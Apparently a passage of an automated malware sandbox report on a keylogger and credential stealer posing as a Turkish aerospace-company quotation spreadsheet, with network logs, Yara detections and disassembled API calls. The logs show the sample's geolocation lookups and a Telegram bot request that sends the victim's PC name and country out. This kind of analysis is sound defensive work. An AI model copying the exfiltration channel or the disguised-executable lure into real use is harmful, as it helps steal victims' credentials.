2024-12-17 08:41:38 UTC	870	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413666 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VLOv1LpXRDMjOdJFh65UWVTDBcb31AevLLTeTPzMLEGQgUiuS67BIBBc9P4RSNinoMBpUnFOD5jzJOlQDC8aNQcH1bwzGJ0GCCQH36MB4uUkimic2mWdkZKrERIkcEtavZHbope"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d7c3e8343f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1728833&cwnd=213&unsent_bytes=0&cid=1acf5ac5072b89a3&ts=463&x=0"
2024-12-17 08:41:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49718	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 08:41:41 UTC	876	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413670 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQrZXRN1M%2BBYE6cgYoQmTEscP71Kpb7zZL1O%2FWD3Y2kEkUD1Xumt3CNieBwnSb6wqr6b3AgbrGo%2Frr6kXoeHSJVV8Ty0lqbETtUN3GTWEPRJVRMHnH4ASNwdnWGE2XKhNPYSozb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d906e4a19c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1783&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1527995&cwnd=146&unsent_bytes=0&cid=f0cfc981893b6ac4&ts=449&x=0"
2024-12-17 08:41:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49720	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:43 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 08:41:44 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413673 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR2RAwAW6gVMhnogo4xzAip9eY9OUbetoSCYAeGpXS34hHhXZs62oFbt48MZ93%2FLo1pIl755UcIxrZ6fQ4Mo3%2FNi6hYQAD%2FKeXLLXCn%2B%2BtkfEJTHkM0ciGrwDdAeTFWqRqHGlViH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359da31f0f5e6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1799137&cwnd=224&unsent_bytes=0&cid=d444569939be9805&ts=450&x=0"
2024-12-17 08:41:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49722	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 08:41:47 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413676 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uG6MzPNM237Ausrmq99RRe%2BOfchDc5iXpuoWn46w%2FPZO4M%2BRZ52CfI9v5XdaJdB8CCJ1dhpnzptjiSWLh19z7K8xJCFYUSrcGh8Vq0MQEUuuBHFaHIKTa3dXaMxjiQ1IitIe3E%2FW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359db61d755e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1574&rtt_var=901&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1036563&cwnd=251&unsent_bytes=0&cid=0f3fe166fe660bac&ts=448&x=0"
2024-12-17 08:41:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49724	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:49 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 08:41:50 UTC	876	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413679 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2SVPMqLwntTHycsuk6e0juk%2FepVTmXUgmBzMSD4zqmhaMw4fRKtSq%2BGWx6wdI9cs0eS7Cnsf9oLLSeAAXPFoyhFa93DqyLfFTfOtB0CLVXv2fiAzdVKacov4OobSus%2Fd3L1ieH0w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359dc8c8580f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1440&rtt_var=555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1946666&cwnd=215&unsent_bytes=0&cid=6e428121b3f4b59c&ts=452&x=0"
2024-12-17 08:41:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49725	149.154.167.220	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:51 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-17 08:41:52 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 08:41:52 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 08:41:52 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 7876, Parent PID: 4084

General

Target ID:	0
Start time:	03:41:18
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0x180000
File size:	1'079'296 bytes
MD5 hash:	711D0893A047D1AAABD5CB4C1FD8F4AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:41:21
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0x280000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2658183432.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 7876, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	68

Executed Functions

Function 001842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0018430D

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

GetCurrentProcess.KERNEL32(?,0021CB64,00000000,?,?), ref: 00184422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00184429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00184454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00184466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00184474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0018447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001844A0

Strings

GetNativeSystemInfo, xrefs: 00184460
|O, xrefs: 001C36F8
kernel32.dll, xrefs: 0018444F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: d5087a8a4c9cb2e45eb9bed39b902c0c0a26aa78f26ba23034e727317116e5fd
Instruction ID: 842f7960bcbaa43022de5312ad46ddf0f315e9f17a62a8357f920ba864153e4d
Opcode Fuzzy Hash: d5087a8a4c9cb2e45eb9bed39b902c0c0a26aa78f26ba23034e727317116e5fd
Instruction Fuzzy Hash: 2DA1D27590A3C0FFC715DB68B86C7947FA46F36346B1888DCE04193A61D7304AA8CB29

Function 001842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001850AA,?,?,00000000,00000000), ref: 001842B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001850AA,?,?,00000000,00000000), ref: 001842C9
LoadResource.KERNEL32(?,00000000,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20), ref: 001C35BE
SizeofResource.KERNEL32(?,00000000,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20), ref: 001C35D3
LockResource.KERNEL32(001850AA,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20,?), ref: 001C35E6

Strings

SCRIPT, xrefs: 001842BF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 20d6247b649cf9b68522475206e128cd7d2ce2a04fd542353175e6012504f2d5
Instruction ID: cbdf4a9d694f870eaae41d7c27f59d59e11a4546672097955519ee7bbadcb429
Opcode Fuzzy Hash: 20d6247b649cf9b68522475206e128cd7d2ce2a04fd542353175e6012504f2d5
Instruction Fuzzy Hash: 7211AC78240305BFD7219B65EC48FA77BBAEBD9B55F208169B802C6250DF71D9008A20

Function 001C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00182B6B

Part of subcall function 00183A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00251418,?,00182E7F,?,?,?,00000000), ref: 00183A78

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00242224), ref: 001C2C10
ShellExecuteW.SHELL32(00000000,?,?,00242224), ref: 001C2C17

Strings

runas, xrefs: 001C2C0B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: cbb3cb30c4540e2773f8996cc307d45e3719e74129ad08b65227699000803322
Instruction ID: a8984c2846ba20213619a9366baaee7d85276a9cd09d6a9af04c07206ef3d4eb
Opcode Fuzzy Hash: cbb3cb30c4540e2773f8996cc307d45e3719e74129ad08b65227699000803322
Instruction Fuzzy Hash: 4D11D331208305AAC719FF60E855EBEB7A4ABB2741F48142DF492570A2CF318B5A8F12

Function 001EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,001C5222), ref: 001EDBCE
GetFileAttributesW.KERNELBASE(?), ref: 001EDBDD
FindFirstFileW.KERNELBASE(?,?), ref: 001EDBEE
FindClose.KERNEL32(00000000), ref: 001EDBFA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: cc813d0a7ab1d1056f05e282e7600dc233b8795dc9d63d18d1518b221ff7732c
Instruction ID: a48cfffe09c6ac8cb128ad7968c5b99a0a5bd859055e59c487e7354b1bcceabe
Opcode Fuzzy Hash: cc813d0a7ab1d1056f05e282e7600dc233b8795dc9d63d18d1518b221ff7732c
Instruction Fuzzy Hash: D4F0A9308909106782206B7CBC0D8AE37AC9E02374B30870AF836C20E0EFB099A48696

Function 0018BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#%, xrefs: 001D07CE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

